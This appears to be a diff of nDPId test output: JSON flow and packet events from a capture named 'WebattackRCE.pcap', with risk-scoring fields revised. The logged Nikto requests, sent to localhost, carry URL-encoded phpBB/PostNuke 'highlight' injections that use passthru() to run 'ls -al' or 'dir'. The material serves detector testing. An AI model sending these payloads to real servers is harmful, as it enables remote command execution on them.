{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001393)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00881{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_packet_id":1,"flow_last_seen":1576420277794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"ts_msec":1576420277794,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgStAAEAGumR\/AAABfwAAAcbsH5DtZbgCN0MtSoAYAED\/WgAAAQEICp1m\/0qdZv9KR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001394)"}}
+01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001394)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00881{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_packet_id":1,"flow_last_seen":1576420277795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"ts_msec":1576420277795,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgfFAAEAGuZ5\/AAABfwAAAcbuH5ChILjHXT7L3YAYAED\/WgAAAQEICp1m\/0udZv9LR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NSkNCg0K"}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001395)"}}
+01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001395)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_packet_id":1,"flow_last_seen":1576420277797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"ts_msec":1576420277797,"pkt":"AAAAAAAAAAAAAAAACABFAAFPlMhAAEAGpt5\/AAABfwAAAcbwH5AHpq3wv20OaIAYAED\/QwAAAQEICp1m\/02dZv9NR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-01004{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001396)"}}
+01193{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001396)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00881{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_packet_id":1,"flow_last_seen":1576420277799,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"ts_msec":1576420277799,"pkt":"AAAAAAAAAAAAAAAACABFAAFm4IpAAEAGWwV\/AAABfwAAAcbyH5CWqtmi9bUd64AYAED\/WgAAAQEICp1m\/0+dZv9PR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
+01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_packet_id":1,"flow_last_seen":1576420277800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"ts_msec":1576420277800,"pkt":"AAAAAAAAAAAAAAAACABFAAFvelxAAEAGwSp\/AAABfwAAAcb0H5AcBENxXyULZYAYAED\/YwAAAQEICp1m\/1CdZv9QR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
+01226{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_packet_id":1,"flow_last_seen":1576420277802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"ts_msec":1576420277802,"pkt":"AAAAAAAAAAAAAAAACABFAAF0IClAAEAGG1l\/AAABfwAAAcb2H5CLkRkOnTgF7oAYAED\/aAAAAQEICp1m\/1GdZv9RR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KDQo="}
-01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
+01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_packet_id":1,"flow_last_seen":1576420277803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"ts_msec":1576420277803,"pkt":"AAAAAAAAAAAAAAAACABFAAFudhVAAEAGxXJ\/AAABfwAAAcb4H5C7R086db2J2oAYAED\/YgAAAQEICp1m\/1OdZv9TR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
